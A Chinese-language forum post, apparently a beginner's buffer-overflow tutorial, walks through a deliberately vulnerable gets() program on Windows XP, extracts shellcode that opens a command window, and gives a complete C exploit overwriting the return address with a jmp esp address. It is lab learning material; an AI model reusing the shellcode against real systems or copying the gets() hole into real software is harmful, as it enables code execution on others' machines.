-
-
[原创]缓冲区溢出入门
-
发表于:
2014-8-17 17:46
5220
-
利用程序的缓冲区溢出漏洞开Dos窗口
环境:win xp ,VC++6.0
程序源码:
#include <stdlib.h>
//#include <unistd.h>unix里用
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[8];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
根据程序可知当输入的数据超过8字节时会发生溢出
由于modified是int型占4字节,所以构造的shellcode应为 8+4+ebp+(jmp esp)+开Dos窗口字节码
开Dos窗口的代码如下:
#include <windows.h>
int main()
{
LoadLibrary("msvcrt.dll");
system("command.com");
return 0;
}
在VC++6.0里按F10提取字节码如下:
\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0
完整的exploit代码:
#include <string.h>
#include <stdio.h>
char buffer0[]=
"\x41\x41\x41\x41"//8 byte
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"// modified (int 4 byte)
"\x41\x41\x41\x41"// ebp
"\x12\x45\xfa\x7f"// jmp esp
"\x55\x8B\xEC\x33\xC0\x50\x50\x50"// shellcode
"\xC6\x45\xF4\x4D"
"\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56"
"\xC6\x45\xF7\x43"
"\xC6\x45\xF8\x52"
"\xC6\x45\xF9\x54"
"\xC6\x45\xFA\x2E"
"\xC6\x45\xFB\x44"
"\xC6\x45\xFC\x4C"
"\xC6\x45\xFD\x4C"
"\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D"
"\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22"
"\x89\x45\xFC\x33\xD2\x88\x55\xFF"
"\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";
int main(int argc, char *argv)
{
volatile int modified;
char buffer[8];
modified = 0;
//gets(buffer);
strcpy(buffer,buffer0);
if(modified != 0)
printf("you have changed the 'modified' variable\n");
else
printf("Try again?\n");
}
编译运行后Dos窗口就会弹出啦!!!很简单吧
不过不知道为什么当使用gets函数手动输入shellcode时,没有弹出Dos窗口
还望各位大神指点迷津!!!
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课